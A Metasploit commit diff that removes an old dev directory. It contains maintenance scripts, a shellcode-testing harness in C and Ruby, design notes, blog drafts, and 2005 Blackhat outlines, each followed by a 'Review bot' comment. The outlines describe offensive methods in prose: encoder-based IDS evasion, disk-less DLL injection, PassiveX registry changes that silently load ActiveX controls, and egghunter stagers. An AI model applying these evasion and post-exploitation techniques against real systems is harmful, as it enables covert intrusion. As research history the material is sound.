Nuke the old/obsolete dev directory

git-svn-id: file:///home/svn/framework3/trunk@5960 4d416f70-5f16-0410-b530-b9f4589650da
HD Moore 2008-11-19 07:15:44 +00:00
parent 412e4a27ef
commit 70be992586
179 changed files with 0 additions and 54053 deletions

View File

@ -1,32 +0,0 @@
#!/usr/bin/env ruby
banner =
%q{##
# $Id:$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
}
mod = ARGV.shift
data = File.read(mod)
if (data =~ /This file is part of the Metasploit/) {
exit(0)
}
fd = File.open(mod, 'w')
fd.write(banner)
fd.write(data)
fd.close
system("svn propset svn:keywords 'Rev Revision Id Header' #{mod}")
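Review bot: the conditional `if (data =~ /This file is part of the Metasploit/) {` ... `}` is C/Perl brace syntax and does not parse in Ruby; it needs `if ... end`, i.e. `if data =~ /This file is part of the Metasploit/` / `exit(0)` / `end`. Separately, `system("svn propset svn:keywords 'Rev Revision Id Header' #{mod}")` interpolates the unquoted filename into a shell command, so a path containing spaces or shell metacharacters is split or interpreted by the shell; the list form `system("svn", "propset", "svn:keywords", "Rev Revision Id Header", mod)` bypasses the shell entirely.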

View File

@ -1,39 +0,0 @@
#/usr/bin/perl
use strict;
die if @ARGV != 1;
move($ARGV[0]);
sub old_to_new {
my $name = shift;
$name =~ s/^([A-Z])/lc($1)/ge;
$name =~ s/([A-Z])/"_" . lc($1)/ge;
return($name);
}
sub move {
my $dir = shift;
my @entries;
opendir(DIR, $dir) || die "Can't open $dir: $!\n";
@entries = readdir(DIR);
closedir(DIR);
foreach my $entry (@entries) {
next if($entry eq 'Attic' || $entry =~ /^\./);
my $path = $dir . '/' . $entry;
my $newpath = $dir . '/' . old_to_new($entry);
if(-d $path) {
move($path);
}
print "$path -> $newpath\n";
rename($path, $newpath) || die("BAH!");
}
}
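Review bot: the shebang `#/usr/bin/perl` is missing the `!`, so the script cannot be run directly and the line is just a comment when it is fed to perl by hand. More importantly, `rename($path, $newpath) || die("BAH!");` silently replaces an existing `$newpath` (rename overwrites on POSIX), and nothing guards against `old_to_new` mapping two different entries to the same name; check `-e $newpath` before renaming and skip the call when `$path eq $newpath`. `old_to_new` here also turns an all-uppercase name such as `HTTP` into `h_t_t_p`, which is not what the require-rewriting script in this same change produces for the same input.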

View File

@ -1,27 +0,0 @@
#!/usr/bin/perl -pi
use strict;
s/require '(.*?)'/"require '" . waka($1) . "'"/ge;
sub waka {
my $required = shift;
my @pieces = split('/', $required);
map { $_ = old_to_new($_) } @pieces;
my $new = join('/', @pieces);
return $new;
}
sub old_to_new {
my $name = shift;
if(uc($name) eq $name) {
return(lc($name));
}
$name =~ s/^([A-Z])/lc($1)/ge;
$name =~ s/([A-Z])/"_" . lc($1)/ge;
return($name);
}
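Review bot: `old_to_new` special-cases all-uppercase names (`if(uc($name) eq $name) { return(lc($name)); }`) but the directory-renaming script above does not, so for a component such as `HTTP` the rewritten `require` path and the renamed file on disk will not agree. Also, `#!/usr/bin/perl -pi` edits every input file in place with no backup suffix, and `require '(.*?)'` rewrites every single-quoted require, standard-library ones included, not only the framework's own paths; restricting the match to the framework's lib prefixes, or running once with `-pi.bak` to review the result, would be safer.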

View File

@ -1,48 +0,0 @@
Auxiliary Module Design
-----------------------
The goal of this document is to define the requirements and basic
implementation of Metasploit v3.0 Auxiliary Modules. Auxiliary modules have a
unique role in the Framework in that they can do just about anything.
Auxiliary modules work similar to exploits, in that the user selects a module,
configures, and launches it, but differs in that they do not execute arbitrary
code on target systems.
Design Goals
------------
Auxiliary modules should be capable of performing reconnaisance activities,
such as sending probes or listening to the network, and exporting the data
into a persistent storage system accessible to the rest of the Framework. Not
all auxiliary modules produce this type of data, some may perform intrusive
actions, such as file retrieval or modifying access credentials.
An Auxiliary module has the ability to define new commands and then process
these commands. Any user interface that sypports Auxiliary modules needs to
take into account this fact and allow these optional commands to be accessed.
Unlike exploits, auxiliary modules do not use Targets, instead they support
what we call Actions. An Action is an option, that when set, causes the
auxiliary module to perform a selected task. Between the extensible command
set and the Actions system, a single auxiliary module is capable performing an
almost infinite number of tasks.
An example would be a module that performs various tasks against a Microsoft
SQL Server. This module would only support the default command of 'run', but
could allow the user to send a UDP probe and display the data, perform an
account brute force, or scan all open ports for an exposed MSSQL DCERPC
interface.
Storage
-------
Requirements
------------
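Review bot: the `Storage` and `Requirements` headings at the end of the document have no body, so the design doc is incomplete as committed; either fill them in or drop the headings. The body also has typos worth a pass if this text is kept anywhere else (`reconnaisance`, `sypports`, `capable performing`).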

View File

@ -1,75 +0,0 @@
From nolimit.bugtraq@gmail.com Sun Jan 22 16:40:09 2006
From nolimit.bugtraq@gmail.com Sun Jan 22 22:39:35 2006
Return-Path: <nolimit.bugtraq@gmail.com>
X-Spam-Checker-Version: SpamAssassin 3.1.0-gr0 (2005-09-13) on sugar.14x.net
X-Spam-Level:
X-Spam-Status: No, score=-2.1 required=5.0 tests=BAYES_00,HTML_40_50,
HTML_MESSAGE autolearn=ham version=3.1.0-gr0
Delivered-To: hdm-hdm@metasploit.com
Received: (qmail 8349 invoked from network); 22 Jan 2006 16:39:35 -0600
Received: from unknown (HELO uproxy.gmail.com) (66.249.92.203)
by sugar.14x.net with SMTP; 22 Jan 2006 16:39:35 -0600
Received: by uproxy.gmail.com with SMTP id j3so504335ugf
for <hdm@metasploit.com>; Sun, 22 Jan 2006 14:40:09 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=beta; d=gmail.com;
h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
b=FBG7YV3XXWeZisoQR5v8dxhWbwA/m0bXqv9oL5+jChFGrjP4k1cR2k8HdCygCpy1yJQoMLwlbPNVtdUkYMAoFg+fTTRDbZiiM8XQtidhcaM41Hbep60wkSBX8UemqRSLFaX0fRqiNDkHrAyEkVZOedxEwEzy+YYDFeqEiGVWib8=
Received: by 10.66.219.19 with SMTP id r19mr1989749ugg;
Sun, 22 Jan 2006 14:40:09 -0800 (PST)
Received: by 10.66.255.7 with HTTP; Sun, 22 Jan 2006 14:40:08 -0800 (PST)
Message-ID: <786b40bf0601221440x27049938h4c4fd527c23b930c@mail.gmail.com>
Date: Sun, 22 Jan 2006 17:40:09 -0500
From: nolimit bugtraq <nolimit.bugtraq@gmail.com>
To: H D Moore <hdm@metasploit.com>
Subject: Re: Metasploit Framework License
In-Reply-To: <200601221520.34147.hdm@metasploit.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_10104_11843058.1137969609003"
References: <200601221520.34147.hdm@metasploit.com>
Status: R
X-Status: NC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:
------=_Part_10104_11843058.1137969609003
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
I give you full rights to use any exploits I've published in the metasploit
framework, and continue to be honored by it.
On 1/22/06, H D Moore <hdm@metasploit.com> wrote:
>
> Hello,
>
> I you are receiving this email, there is a good chance that you
> contributed to the Metasploit Framework sometime in the past.
> Starting with version 3.0, we are changing the licensing terms.
> <CUT>
>
------=_Part_10104_11843058.1137969609003
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
I give you full rights to use any exploits I've published in the metasploit=
framework, and continue to be honored by it. <br><br>
<div><span class=3D"gmail_quote">On 1/22/06, <b class=3D"gmail_sendername">=
H D Moore</b> &lt;<a href=3D"mailto:hdm@metasploit.com">hdm@metasploit.com<=
/a>&gt; wrote:</span>
<blockquote class=3D"gmail_quote" style=3D"PADDING-LEFT: 1ex; MARGIN: 0px 0=
px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Hello,<br><br>I you are receivin=
g this email, there is a good chance that you<br>contributed to the Metaspl=
oit Framework sometime in the past.
<br>Starting with version 3.0, we are changing the licensing terms.<br>&lt;=
CUT&gt;<br></blockquote></div>
------=_Part_10104_11843058.1137969609003--
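Review bot: this file is the only copy of the contributor's licence grant visible in this change, and it goes away with the rest of the directory; if that permission still matters for the 3.0 relicensing it should be archived outside this tree before removal. Wherever it is kept, the full transport headers (the `Received:` lines with the relay hostname and IP, the `DomainKey-Signature:`) and the duplicate `text/html` part are not needed to document the grant; the `text/plain` body is sufficient.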

View File

@ -1,55 +0,0 @@
#!/usr/local/bin/ruby
if ARGV.empty?
puts "usage: <delta value | t> <files ...>"
exit(1)
end
textmode = false
if ARGV[0] == 't'
ARGV.shift
textmode = true
else
delta = ARGV.shift.to_i
end
first = TRUE
last = [ ]
# simple algorithm, build up a list of all the possible addresses
# calculating the delta range for each address in the file... then
# just do a set intersection across these all and you have your results
ARGV.each do |file|
cur = [ ]
IO.foreach(file) do |line|
if textmode
cur << line
else
addr = line.hex
(-delta .. delta).each do |d|
cur << addr + d
end
end
end
if first
first = FALSE
last = cur
else
last = last & cur
end
end
# print da results
last.each { |l|
if textmode
puts l
else
puts "0x%08x" % l
end
}
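Review bot: `first = TRUE` and `first = FALSE` use the `TRUE`/`FALSE` constants, which are deprecated since Ruby 2.4 and removed in 3.0; use `true`/`false`. `delta = ARGV.shift.to_i` accepts a negative or non-numeric argument silently, which makes `(-delta .. delta)` empty and yields an empty intersection instead of an error; validate `delta >= 0` before the loop. It would also help a future reader to note next to `cur << line` that text mode keeps the trailing newline on each line, so the `last & cur` intersection compares lines including the `\n`.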

File diff suppressed because one or more lines are too long

View File

@ -1,2 +0,0 @@
load db_postgres
exit

View File

@ -1,7 +0,0 @@
load db_sqlite3
db_create
db_import_nessus_nbe /home/hdm/local.nbe
db_hosts
db_vulns
db_destroy
db_hosts
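Review bot: `db_import_nessus_nbe /home/hdm/local.nbe` hardcodes a path under one developer's home directory, so this resource script only works on that machine; document that the path must be edited before use. The trailing `db_destroy` / `db_hosts` pair appears to check that the database is really gone after destruction, but that intent is not stated anywhere in the file.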

View File

@ -1,19 +0,0 @@
load db_sqlite3
use aux/recon
set RHOST 127.0.0.1
set ACTION Probe All Ports
run
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services
sleep 1
db_services
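Review bot: the seven repeated `sleep 1` / `db_services` pairs after `run` are a hand-written polling loop waiting for the probe to populate the database; it only gives a complete answer if the scan finishes within about seven seconds, and otherwise the last `db_services` still shows partial results. A single longer sleep, or a check that the module has finished before querying, would make the test deterministic. `set ACTION Probe All Ports` also relies on `set` taking the rest of the line verbatim as the action name, which deserves a comment.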

Binary file not shown (image, 10 KiB).

Binary file not shown (image, 5.3 KiB).

File diff suppressed because it is too large

Binary file not shown (image, 52 KiB).

View File

@ -1,11 +0,0 @@
OPTS="-x .ut.rb -x .ts.rb -q"
BASE="documentation/api"
echo "Generating rex..."
rdoc $OPTS -t "Rex Documentation" -o $BASE/rex lib/rex
echo "Generating msfcore"
rdoc $OPTS -t "Framework Core Documentation" -o $BASE/msfcore lib/msf/core
echo "Generating msfbase"
rdoc $OPTS -t "Framework Base Documentation" -o $BASE/msfbase lib/msf/base
echo "Generating msfui"
rdoc $OPTS -t "Framework UI Documentation" -o $BASE/msfui lib/msf/ui
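Review bot: the script has no shebang line and relies on word-splitting of the unquoted `$OPTS` to pass several flags to rdoc; that works under sh/bash, but an explicit `#!/bin/sh` plus `set -e` would stop at the first failing `rdoc` invocation instead of continuing and reporting partial documentation as success. The `-x` arguments `.ut.rb` and `.ts.rb` are regular-expression patterns, so the unescaped dots match any character; `\.ut\.rb` / `\.ts\.rb` is what is intended.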

View File

@ -1,2 +0,0 @@
require 'mkmf'
create_makefile('machinetestinternal')

View File

@ -1,12 +0,0 @@
#!/usr/bin/env ruby
require 'machinetestinternal'
module MachineTest
def MachineTest.test(str, all = false)
MachineTest::Internal.test(str + "\xcc", all)
end
def MachineTest.testraw(str, all = false)
MachineTest::Internal.test(str, all)
end
end
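Review bot: `MachineTest.test` appends `"\xcc"` (an `int3` breakpoint) so that a payload which runs to its end traps with SIGTRAP, which is the condition the native `test` function treats as success; `MachineTest.testraw` omits that byte, so unless the caller's string already ends in a trap the child falls through to `exit(1)` and every offset is reported as a failure. A comment on `testraw` stating that the caller must supply its own terminating `int3`, and one on `test` explaining the appended byte, would prevent misuse.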

View File

@ -1,67 +0,0 @@
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <errno.h>
#include <ruby.h>
#include <signal.h>
#define PAGE_SIZE 0x1000
static VALUE t_test(VALUE self, VALUE str, VALUE all) {
int len = 1, pid, status, i;
char *ptr, *start, *stop;
str = StringValue(str);
/* test all of the string, instead of just from the beginning */
if(all == Qtrue)
len = RSTRING(str)->len;
while(len-- > 0) {
switch(fork()) {
case -1:
perror("fork");
rb_raise(rb_eRuntimeError, "fork failed!");
case 0:
for(i = 0; i < 20; i++) {
signal(i, SIG_DFL);
}
ptr = RSTRING(str)->ptr + len;
start = (char *)((unsigned int)ptr & ~(PAGE_SIZE-1));
stop = (char *)(((unsigned int)(ptr + (RSTRING(str)->len - len)) + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1));
__asm__ __volatile__(
"mov %0, %%eax"
:
: "m"((long)ptr)
: "%eax");
if ((i = mprotect(start, (int)(stop - start), PROT_EXEC|PROT_WRITE|PROT_READ)) != 0)
printf("mprotect failed, %d %d\n", i, errno);
((void (*)(void)) RSTRING(str)->ptr + len)();
exit(1);
default:
wait(&status);
if(!WIFSIGNALED(status) || WTERMSIG(status) != 5) {
return INT2NUM(len);
}
break;
}
}
return Qnil;
}
void Init_machinetestinternal() {
VALUE cTest;
cTest = rb_define_module_under(
rb_define_module("MachineTest"),
"Internal"
);
rb_define_module_function(cTest, "test", t_test, 2);
}
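Review bot: `start = (char *)((unsigned int)ptr & ~(PAGE_SIZE-1));` and the `stop` computation on the next line truncate the pointer to 32 bits, so on a 64-bit build `mprotect` is handed a wrong address; use `uintptr_t`. `((void (*)(void)) RSTRING(str)->ptr + len)();` casts before adding, so `+ len` is arithmetic on a function pointer (a GNU extension that happens to work with a one-byte stride); `((void (*)(void))(RSTRING(str)->ptr + len))()` is what is meant. `WTERMSIG(status) != 5` hardcodes SIGTRAP's number even though `signal.h` is included; use `SIGTRAP`. The inline asm that loads `ptr` into `%eax` has no comment explaining why (presumably so payloads may assume `eax` points at their buffer), and its `"m"((long)ptr)` constraint applies a memory operand to a cast expression, which GCC may reject as not directly addressable. Finally, `RSTRING(str)->len` / `->ptr` are the Ruby 1.8 accessors; `RSTRING_LEN` / `RSTRING_PTR` work on both 1.8 and 1.9.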

Binary file not shown.

File diff suppressed because it is too large

View File

@ -1,33 +0,0 @@
Blog entry, Stardate April, 2005
We have recently been on a new shellcode kick, but this time it's not about
making them smaller. We're currently working on building very power new
post-exploitation shellcode and toolkits, and a very powerful unified API
to expose their functionality. This will allow us to diverge from precanned
payloads, allowing users to quickly build power and portable post-exploitation
tools. We've have built strongly upon our Windows DLL injection, and are
working on extending similar functionality to the land of Unix. We're also
working hard on the next version of Metasploit, which follows this same
philosophy of emedability and extensablity, allowing users to build their own
tools on top of our framework. Our previous work was all about exploit
frameworks. Our new approach we are really building more of a hacker tool
framework, allowing very strong automation and customization.
ignore this.....
With Metasploit 3.0 on the horizon, we've been working hard on design and
building components to take a very different focus. Currently Metasploit 2
is very much an end user tool, and doing anything custom isn't so elegant.
The approach we are taking in Metasploit 3, is "Metasploit as a library". We
are working very hard on writing post-exploitation suites for different
platforms, and then building a unified API that they all adhere to. This will
allow you to directly script remote hosts, proxying file operations, network
communications, and transparent channelized communication. The new system is
being designed to be threadsafe to a high degree, forcing us to rethink and
redesign many of our tools and protocols. Our new system is design to allow
you to do things like run 10 exploits concurrently, all "pivoting" through
a host you previously owned. Along with this new feature set, we are still
concentrating on keeping things off disk, all in-memory injection, etc.
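Review bot: the file holds two drafts of the same blog entry separated by the line `ignore this.....`, so it is not clear which one was published; if the text is kept, drop the discarded draft. Spelling in both drafts needs a pass (`very power new`, `emedability and extensablity`, `Our new system is design to`).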

View File

@ -1,383 +0,0 @@
[12:52:34] -> *spewnum* damn you! :) fine, we'll just call them payloads, and then we'll break it up as Payload Stagers, Payload Stages, and
Post-exploitation suites, does that sound coo?
I. Introduction
A. Who are we?
1. spoonm
2. skape
3. Why do we do this hoodoo voodoo
B. Exploit Technology
1. Three Phases of Exploitation
a. Pre-exploitation
b. Exploitation
c. Post-exploitation
2. Pre-exploitation - Before the attack
a. Find the bug
b. Write exploits, payloads, tools
3. Exploitation - Leveraging the vulnerability
a. Find a target
c. Gather info, setup tools, prepare listeners, etc
b. Launch attack
4. Post-Exploitation - Manipulating the target
a. Command shell redirection
b. Arbitrary command execution
c. Pivoting payloads
d. Advanced payload interaction
B. Where do we stand?
1. Pre-exploitation
a. Robust and elegant encoders do exist
i. SkyLined's alpha-numeric encoder
ii. Spoonm's Shikata Ga Nai
b. Payload encoders generally taken for granted
NOTE: maybe expand a little bit more here...
i. Most encoders are static with a variable key
ii. IDS able to signature static decoder stubs
c. NOP generation hasn't publically changed much
i. PoC exploits generally use predictable nops, if any
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
iii. Not considered very important to many researchers
d. NIDS deployments are playing chase the tail
i. The mouse always has the advantage; NIDS is reactive
ii. Advanced nops and encoders push NIDS to its limits
NOTE: maybe talk about how complex some things are to signature,
for example, RPC, application level fragmentation, etc.
2. Exploitation
a. Techniques have become very mature
i. Linux/BSD exploitation techniques largely unchanged
ii. Win32 heap overflows now more reliable (oded/shok)
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
b. Exploitation topics have been beaten to death
3. Post-exploitation
a. Common payloads are limited
i. Command shell interaction has poor automation support
ii. Limited to the command set that the interpreter provides
iii. Bounded by the utilities installed on the target machine
iv. Restrictive environments (chroot) can hinder command execution
v. HIPS vendors becoming more adept at detecting basic payloads
- LoadLibraryA from the stack, etc (mcafee 8.0i)
NOTE: I think it would be important here to talk even about the
issues with "advantage" payloads, ala Core Impact and CANVAS.
We should look into them more, but I have a hunch that they
aren't that well writte, don't have that great of APIs
exposed, and aren't very extensible for a 3rd party not
on the team authoring the product. Even the "advanced" stuff
I think has a lot of issues.
b. Communication vectors largely unchanged
i. Reverse and port-bind payloads still the most common
ii. Findsock style payloads still unused by PoC exploits
iii. Alternative communication vectors rarely discussed
c. Pivoting technology exists
i. Core ST described system call proxying in 2002
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
C. What will we discuss?
1. Pre-exploitation Research
a. NOP generation
i. Opty2
b. Encoders
i. Additive feedback encoders
ii. Shikata Ga Nai
2. Post-Exploitation Research
a. Library Injection
i. Facilitates things like Meterpreter and VNC injection
b. VNC Injection
i. Introduced at blackhat04 with the Metasploit 2.2 release
c. Meterpreter & dN
i. The cross-platform post-exploitation suite
NOTE: dN is weak, but maybe talk about it from a different perspective,
just about allowing the attacker to really orcistrate everything
down even to the system call level. Definitely should talk a
bunch about your ninjaness with meterp TLV stylies, and the
channelized throwdown. (</thuggin>).
3. Payload Research
a. PassiveX
i. Taking advantage of ActiveX controls
ii. Taking advantage of soccer playing sisters.
b. Ordinal Stagers
i. Tiny network capable stagers
c. Egghunt (maybe?)
i. Small payload capable of locating a larger payload
ii. Useful for exploits with limited space
NOTE: Egghunt is cool, and we can just talk a bit about how we
extracted the syscalls, and how all of our tools come together
to do stuff like that really fast/easily. Oded mentioned he
saw the page and thought it was cool, he wondered how you
got the prototypes...
II. Pre-exploitation
A. OptyNop2
1. Creation and benefits of multi-byte nopsleds
B. Additive feedback encoders
C. Shikata Ga Nai
1. High permutation shellcode through simple dependency mappings
III. Post-exploitation
A. Library Injection
1. Overview
a. Paper published in 04/2004
b. Provides advanced code execution
c. Code can be written in any language that can compile down
to a shared object.
d. Allows developer to use all of the APIs exposed to a normal
application.
e. Detailed explanation can be found in included resources
(include lib inject paper)
2. Two types of library injection
a. On-Disk
i. Library is loaded from the target's harddrive or via a
file share.
ii. Can be detected by AV products due to fs access
b. In-Memory
i. Library is uploaded to the target and loaded from memory
without touching the disk
ii. Evades file system filter drivers, such as those
provided by AV companies
iii. Not touching the disk means no forensic trace
iv. VirtualLock prevents swapping to disk, but requires admin
3. In-memory library injection on Windows
a. System calls used by the library loader are hooked
i. NtCreateFile
ii. NtMapViewOfSection
iii. etc
b. Unique image name is used to identify the image to image that
is in memory
c. System call hooks are removed so that future injectino can
occur
d. Alternative approaches
i. Could do client-side relocations, but would need to handle
import processing
4. In-memory library injection on Linux/BSD
a. No known public implementations
b. Requires alternate approach
i. Hooking API routines not always possible -- symtab not
mapped into memory
ii. libc symbol version mismatches lead to linking nightmares
c. Client-side relocations seem most feasible
i. Remote side maps a region of memory and sends the client
the base address
ii. Client processes relocations and transmits the relocated
image as its mapped segment would appear
iii. Requires locating rtld base so that PLT lookups will
work
B. VNC Injection
1. Implements VNC as an injectable DLL
a. Uses RealVNC as the code-base
b. VNC communication uses the exploit connection
c. No physical trace is left of the VNC server
d. Can operate regardless of existing VNC installations
2. Easy way to illustrate insecurities
a. Suits understand mouse movement better than black box command
prompts
C. Meterpreter
1. Generic post-exploitation suite
a. Based on library injection
b. Uses the established exploit connection
i. Especially powerful with findsock payloads; no new connection
c. Executes entirely from memory
d. No new processes or file access required for the payload to
succeed
e. Detailed explanation can be found in included resources
(include meterpreter paper)
2. Extension system provides advanced automation support
a. No need to hand write tedious assembly
b. Existing native code can be ported to a meterpreter extension
3. Architecture
a. Design goals
i. Very flexible protocol; should adapt to extension requirements
ii. Exposure of a channelized communication system to extensions
iii. Stealth operation
iv. Should be portable to various operating systems
v. Client from one platform should work with server on another
platform
b. Protocol
i. Uses TLVs (Type-Length-Value) to support arbitrary data
passing.
ii. TLVs allow the packet parser to be oblivious to the structure
of the value field
iii. Type field is broken down into meta types
4. Core interface
a. Overview
i. Minimal interface to support the loading of extensions
ii. Implements the basic packet transmission and dispatching
facilities
iii. Exposes channel allocation and management to extensions
b. Advanced features
i. Migrating the server instance between processes
5. The ``stdapi'' extension
a. Overview
i. Included in Metasploit 3.0
ii. Provides access to some of the common subsystems of the
target operating system
iii. Allows for easy automation and implementation of robust
post-exploitation scripts
b. File System
i. File and directory interaction
ii. Files can be uploaded and downloaded between the
attacker and the target
c. Network
i. Transparent network pivoting
ii. Route table enumeration and manipulation
iii. Local interface enumeration
d. Process
i. Process execution, optionally with channelized IO
ii. Enumeration of running processes
iii. Modification of arbitrary memory
iv. Creation and modification of running threads
v. Loading and interacting with shared object files
e. Registry
i. General registry API access
ii. Opening, creating, and removing registry keys
iii. Setting, querying, and deleting registry values
iv. Enumeration of both keys and values
f. User interface
i. Disabling local user interaction via the keyboard
and/or mouse (similar to VNC)
ii. Idle timeout checking to see how long it's been
since the user did something interactive
6. The ``priv'' extension
a. Still in development
b. Exposes an interface to escalating local privileges
through local vulnerabilities
c. SAM dumping support similar to pwdump3
D. dN
1. Simple low-footprint post-exploitation tool
2. Useful to scope out execution enviroment, then bootstrap other tools
IV. Payload Research
A. PassiveX
1. Overview
a. Post-exploitation payload
b. A derivative of On-Disk library injection that uses
ActiveX controls
c. Supports arbitrary DLL injection in any language that can
be compiled as an ActiveX control (C++, VB, etc)
d. Detailed analysis can be found in included resources
(include passivex paper)
2. Payload Implementation
a. Disables iexplore Internet zone restrictions on
ActiveX controls
i. Modifies four registry values that are stored per-user
b. Launches a hidden iexplore at a URL with an embedded
OCX
i. The OCX does not have to be signed
ii. No user interaction is required
iii. OCX is automatically downloaded, registered, and loaded
into the browser's context
3. Sample HTTP tunneling ActiveX control
a. HTTP GET/POST used to build tunnel to attacker
i. Uses the WININET API
ii. Outbound traffic from target machine encapsulated in POST
request
iii. Inbound traffic from attacker encapsulated in GET response
iv. Proxy configuration automatically inherited
v. Requires HTTP server capable of performing encap/decap on the
HTTP packets
b. Streaming connection through HTTP tunnel can be created
i. socketpair doesn't exist natively on win32 but can be simulated
with a local listener
ii. Streaming abstraction allows advanced payloads to transparently
use the HTTP transport (Meterpreter, VNC)
iii. Local listener less covert, but highly beneficial
4. Pros
a. Bypasses restrictive outbound filters
b. Re-uses proxy configuration
c. Looks like normal user traffic
d. Allows full access to the win32 API like all forms of
library injection
5. Cons
a. Touches the disk
b. Requires administrative access
i. Internet Explorer prohibits the downloading of
ActiveX controls as non-admin
B. Windows Ordinal Stagers
1. Overview
a. Technique from Oded's lightning talk from core04
b. Uses static ordinals to locate winsock symbol addresses
c. Compatible with all versions of Windows
d. 92 byte reverse stager, 93 byte findsock stager
e. Detailed explanation can be found in included resources
(include spoonm ordinal paper)
2. Reverse Ordinal Stager
a. Walks InitOrderModuleList searching for ws2_32
b. Uses static ordinals to index the export table
c. Creates fd with socket
d. Chains connect and recv frames
e. Returns into buffer read in from file descriptor
C. Egghunting
1. Overview
a. Small stub payload that can search for a larger payload
b. Useful for exploits that have limited payload space but can
stash more payload elsewhere in memory
c. Example exploits include the IE object type vulnerability.
d. Goal is to safely search target address space for the larger
payload.
e. Larger payload is located by searching for an egg that is prepended
to it.
f. Detailed analysis can be found in included resources
(include egghunt paper)
2. Two primary methods of egghunting on Windows
a. SEH
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
versions of Windows (including 9x)
2. Installs a custom exception handler
3. Begins walking the address space
i. When a bad address is encounter, the current pointer is
incremented by PAGE_SIZE
ii. When a mismatch of the egg is encountered, the current pointer
is incremented by one
4. Each address is compared against the 8-byte egg
i. Bad addresses will throw exceptions which will be handled
by the custom exception handler
5. When the egg is found, jump past the egg into the larger payload
b. System call
1. Very small stub (32 bytes), searches for an 8 byte egg, only
compatible with NT+
2. Uses a non-intrusive system call (NtDisplayString) to search validate
addresses
i. Same page walking logic as SEH is used
3. When the egg is found, jump past the egg into the larger payload
3. One primary method of egghunting on Linux
a. System call
1. 30 bytes in size, searches for an 8 byte egg
2. System call technique applies to other UNIX variants as well
3. Uses the sigaction system call to validate 16 bytes at once
4. Pros
i. Very small
5. Cons
i. Corner cases may cause it to be unstable
V. The Complete Picture - Metasploit 3.0
A. The power of pre-exploitation prepartion
1. Abstract NOP generation
2. Abstract payload encoding
3. Abstract exploit connection handlers
i. Bind handler
ii. Reverse handler
iii. Findsock handler
B. The power of exploit generalization
1. Standardized exploit creation interface
i. Robust target definitions
ii. Detailed exploit implementation information
iii. Entirely payload independent, no hardcoding paylaods
C. The power of post-exploitation automation
1. Complicated tasks made simple with scripting
i. Want to download a targets entire harddrive?
ii. Want to disable local user interaction?
iii. Want to upload and play an mp3 on the target?
iv. Want to 'be' on the target's network?
2. Standard interface means cross platform support
VI. Conclusion - where do we go from here?
A. Future Post-exploitation research
1. Mesh network support
2. Expansion of the stdapi described in this document
included resources:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
http://www.hick.org/code/skape/papers/meterpreter.pdf
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
http://www.metasploit.com/users/spoonm/ordinals.txt
cited material:
STRIDE:
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
syscall proxy:
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
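Review bot: the outline opens with a pasted IRC line (`[12:52:34] -> *spewnum* ...`) that does not belong in the document, and section I has two `B.` headings (`B. Exploit Technology` and `B. Where do we stand?`), with the items under I.B.3 lettered `a, c, b`. The `NOTE:` paragraphs are speaker notes rather than outline content, and the `[not released yet]` marker on the passivex paper link should be resolved before the outline is distributed. The `included resources` and `cited material` URLs at the end are what the `(include ... paper)` items refer to, so they belong with the outline.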

View File

@ -1,378 +0,0 @@
04/19/2005
Note:
We've tried to include most of the topics that will be covered in our
presentation. However, many of these things will be discussed, but will not be
our main concentration. The majority of our presentation will be around topic
V. C, our new post-exploitation advances, and how they will be designed and
integrated into Metasploit 3. Metasploit 3 won't be finished in time for
Blackhat, but more important than the software itself is the work we've done
on developing the individual components that it will be built from.
This outline is pretty indepth, so it's hard to pick out all the nuggets of
coolness. We've developed many really useful technologies in the area of
payload development. These are things we've created since last year's
Blackhat, including many advances in polymorphic shellcode, and
high-permutation attacks.
I. Introduction
A. Who are we?
1. spoonm
2. skape
B. Exploit Technology
1. Three Phases of Exploitation
a. Pre-exploitation
b. Exploitation
c. Post-exploitation
2. Pre-exploitation - Preparing the payload
a. NOP generation
b. Payload encoders
c. Connection handler initialization
3. Exploitation - Leveraging the vulnerability
a. Stack overflows
c. Heap overflows
b. SEH overwrites
d. Arbitrary pointer overwrites
4. Post-Exploitation - Manipulating the target
a. Command shell redirection
b. Arbitrary command execution
c. Pivoting payloads
d. Advanced payload interaction
B. Where do we stand?
1. Pre-exploitation
a. Robust and elegant encoders do exist
i. SkyLined's alpha-numeric encoder
ii. Spoonm's Shikata Ga Nai
b. Payload encoders generally taken for granted
i. Most encoders are static with a variable key
ii. IDS able to signature static decoder stubs
c. NOP generation hasn't publically changed much
i. PoC exploits generally use predictable nops, if any
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
iii. Not considered very important to many researchers
d. NIDS deployments are playing chase the tail
i. The mouse always has the advantage; NIDS is reactive
ii. Advanced nops and encoders push NIDS to its limits
2. Exploitation
a. Techniques have become very mature
i. Linux/BSD exploitation techniques largely unchanged
ii. Win32 heap overflows now more reliable (oded/shok)
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
b. Exploitation topics have been beaten to death
3. Post-exploitation
a. Common payloads are limited
i. Command shell interaction has poor automation support
ii. Limited to the command set that the interpreter provides
iii. Bounded by the utilities installed on the target machine
iv. Restrictive environments (chroot) can hinder command execution
v. HIPS vendors becoming more adept at detecting basic payloads
- LoadLibraryA from the stack, etc (mcafee 8.0i)
b. Communication vectors largely unchanged
